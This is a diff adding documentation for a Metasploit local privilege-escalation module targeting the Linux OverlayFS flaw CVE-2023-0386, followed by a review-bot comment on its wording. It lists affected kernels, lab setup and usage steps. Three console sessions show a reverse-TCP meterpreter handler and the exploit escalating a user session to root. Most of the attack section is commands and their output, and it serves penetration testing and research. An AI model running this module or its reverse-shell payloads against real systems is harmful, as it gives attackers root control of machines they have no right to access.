|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +This exploit targets the Linux kernel bug in OverlayFS. |
| 4 | + |
| 5 | +A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities |
| 6 | +was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. |
| 7 | +This uid mapping bug allows a local user to escalate their privileges on the system. |
| 8 | + |
| 9 | +The vulnerability affects: |
| 10 | + |
| 11 | + * Linux kernel from (including) 5.11 up to (excluding) 5.15.91 and from (including) 5.16 Up to (excluding) 6.1.9 |
| 12 | + |
| 13 | +This module was successfully tested on: |
| 14 | + |
| 15 | + * Ubuntu kernel version 5.13.0-1021-oem on x64/amd64 |
| 16 | + |
| 17 | +### Install |
| 18 | + |
| 19 | +1. Install Ubuntu version 22.04 LTS |
| 20 | +2. (Optional) Change kernel version |
| 21 | +``` |
| 22 | +sudo apt update |
| 23 | +sudo apt install -y linux-image-5.13.0-1021-oem linux-headers-5.13.0-1021-oem |
| 24 | +reboot |
| 25 | +``` |
| 26 | +3. Install the required libraries |
| 27 | +``` |
| 28 | +sudo apt update |
| 29 | +sudo apt install -y gcc cmake fuse libfuse-dev libcap-dev |
| 30 | +``` |
| 31 | + |
| 32 | +## Verification Steps |
| 33 | + |
| 34 | +1. Make an Ubuntu |
| 35 | +2. Create a meterpreter or shell payload and upload it to the Ubuntu target |
| 36 | +3. Set up a handler for the payload |
| 37 | +4. Launch the payload as a regular user on the Ubuntu target and connect the handler |
| 38 | +5. Do: `use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc` |
| 39 | +6. Do: `run session=<session> lhost=<lhost>` |
| 40 | +7. You should get a root |
| 41 | + |
| 42 | +## Options |
| 43 | + |
| 44 | +### COMPILE (required) |
| 45 | + |
| 46 | +[Auto|True|False] This selects the binary to use. True will upload the source code and perform |
| 47 | +compilation on target, False will upload a precompiled binary. AUTO will favor compiling on target |
| 48 | +but will fall back to the precompiled option if a compiler cannot be found. |
| 49 | +The default value is `Auto` |
| 50 | + |
| 51 | +### WritableDir (required) |
| 52 | +This indicates the location where you would like the payload and exploit binary stored, as well |
| 53 | +as serving as a location to store the various files and directories created by the exploit itself. |
| 54 | +The default value is `/tmp` |
| 55 | + |
| 56 | +## Scenarios |
| 57 | +### Ubuntu 5.13.0-1021-oem x64/amd64 COMPILE=Auto |
| 58 | +``` |
| 59 | +msf6 > use exploit/multi/handler |
| 60 | +[*] Using configured payload generic/shell_reverse_tcp |
| 61 | +msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp |
| 62 | +
|
| 63 | +[*] Started reverse TCP handler on 192.168.56.1:4444 |
| 64 | +[*] Sending stage (3045380 bytes) to 192.168.56.102 |
| 65 | +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:54776) at 2024-09-05 22:48:42 +0900 |
| 66 | +
|
| 67 | +meterpreter > getuid |
| 68 | +Server username: ubu |
| 69 | +meterpreter > background |
| 70 | +[*] Backgrounding session 1... |
| 71 | +msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc |
| 72 | +[*] Using configured payload linux/x64/meterpreter/reverse_tcp |
| 73 | +msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=1 lhost=192.168.56.1 COMPILE=Auto |
| 74 | +
|
| 75 | +[*] Started reverse TCP handler on 192.168.56.1:4444 |
| 76 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 77 | +[+] The target appears to be vulnerable. Linux kernel version found: 5.13.0 |
| 78 | +[*] Writing '/tmp/.a4HSc5ks' (334 bytes) ... |
| 79 | +[*] Launching exploit... |
| 80 | +[*] Sending stage (3045380 bytes) to 192.168.56.102 |
| 81 | +[+] Deleted /tmp/.a4HSc5ks |
| 82 | +[+] Deleted /tmp/.Smx0d11hH |
| 83 | +[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:54778) at 2024-09-05 22:49:28 +0900 |
| 84 | +
|
| 85 | +meterpreter > getuid |
| 86 | +Server username: root |
| 87 | +``` |
| 88 | + |
| 89 | +### Ubuntu 5.13.0-1021-oem x64/amd64 COMPILE=True |
| 90 | +``` |
| 91 | +msf6 > use exploit/multi/handler |
| 92 | +[*] Using configured payload generic/shell_reverse_tcp |
| 93 | +msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp |
| 94 | +
|
| 95 | +[*] Started reverse TCP handler on 192.168.56.1:4444 |
| 96 | +[*] Sending stage (3045380 bytes) to 192.168.56.102 |
| 97 | +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:54710) at 2024-09-05 22:45:40 +0900 |
| 98 | +
|
| 99 | +meterpreter > getuid |
| 100 | +Server username: ubu |
| 101 | +meterpreter > background |
| 102 | +[*] Backgrounding session 1... |
| 103 | +msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc |
| 104 | +[*] Using configured payload linux/x64/meterpreter/reverse_tcp |
| 105 | +msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=1 lhost=192.168.56.1 COMPILE=True |
| 106 | +
|
| 107 | +[*] Started reverse TCP handler on 192.168.56.1:4444 |
| 108 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 109 | +[+] The target appears to be vulnerable. Linux kernel version found: 5.13.0 |
| 110 | +[*] Writing '/tmp/.uKkt1jtoJ' (334 bytes) ... |
| 111 | +[*] Launching exploit... |
| 112 | +[*] Sending stage (3045380 bytes) to 192.168.56.102 |
| 113 | +[+] Deleted /tmp/.uKkt1jtoJ |
| 114 | +[+] Deleted /tmp/.oaqii9pj |
| 115 | +[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:54712) at 2024-09-05 22:46:19 +0900 |
| 116 | +
|
| 117 | +meterpreter > getuid |
| 118 | +Server username: root |
| 119 | +``` |
| 120 | + |
| 121 | +### Ubuntu 5.13.0-1021-oem x64/amd64 COMPILE=False |
| 122 | +``` |
| 123 | +msf6 > use exploit/multi/handler |
| 124 | +[*] Using configured payload generic/shell_reverse_tcp |
| 125 | +msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp |
| 126 | +
|
| 127 | +[*] Started reverse TCP handler on 192.168.56.1:4444 |
| 128 | +[*] Sending stage (3045380 bytes) to 192.168.56.102 |
| 129 | +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:54616) at 2024-09-05 22:36:45 +0900 |
| 130 | +
|
| 131 | +meterpreter > getuid |
| 132 | +Server username: ubu |
| 133 | +meterpreter > background |
| 134 | +[*] Backgrounding session 1... |
| 135 | +msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc |
| 136 | +[*] Using configured payload linux/x64/meterpreter/reverse_tcp |
| 137 | +msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=1 lhost=192.168.56.1 COMPILE=False |
| 138 | +
|
| 139 | +[*] Started reverse TCP handler on 192.168.56.1:4444 |
| 140 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 141 | +[+] The target appears to be vulnerable. Linux kernel version found: 5.13.0 |
| 142 | +[*] Writing '/tmp/.9tZar0/cve-2023-0386' (2215928 bytes) ... |
| 143 | +[*] Writing '/tmp/.Z37h3bkJpw' (334 bytes) ... |
| 144 | +[*] Launching exploit... |
| 145 | +[*] Sending stage (3045380 bytes) to 192.168.56.102 |
| 146 | +[+] Deleted /tmp/.Z37h3bkJpw |
| 147 | +[+] Deleted /tmp/.9tZar0 |
| 148 | +[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:54618) at 2024-09-05 22:37:31 +0900 |
| 149 | +
|
| 150 | +meterpreter > getuid |
| 151 | +Server username: root |
| 152 | +``` |
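Review bot: Verification Steps step 1, "Make an Ubuntu", is incomplete and does not say which system to build; it should point at the Install section, e.g. "1. Set up an Ubuntu 22.04 LTS target as described under Install (optionally switching to the 5.13.0-1021-oem kernel)", so that the tested configuration is reproducible. Step 7 "You should get a root" should read "You should get a root session" (the scenarios end with `Server username: root`). Smaller points in the same file: the affected-versions bullet mixes "up to" and "Up to"; the `### WritableDir (required)` heading lacks the blank line that follows `### COMPILE (required)`; and the Install step "Install the required libraries" (`fuse libfuse-dev libcap-dev`) should say whether these packages are needed only for on-target compilation (COMPILE=True/Auto) or also at runtime by the precompiled binary uploaded with COMPILE=False, since a reader preparing a target for the precompiled path cannot tell from the text. Finally, all three scenarios show the automatic check reporting "The target appears to be vulnerable. Linux kernel version found: 5.13.0"; the documentation should state that the check is based on the kernel version string, so that users know a distribution kernel with a backported fix may be reported as vulnerable even though the exploit will not succeed.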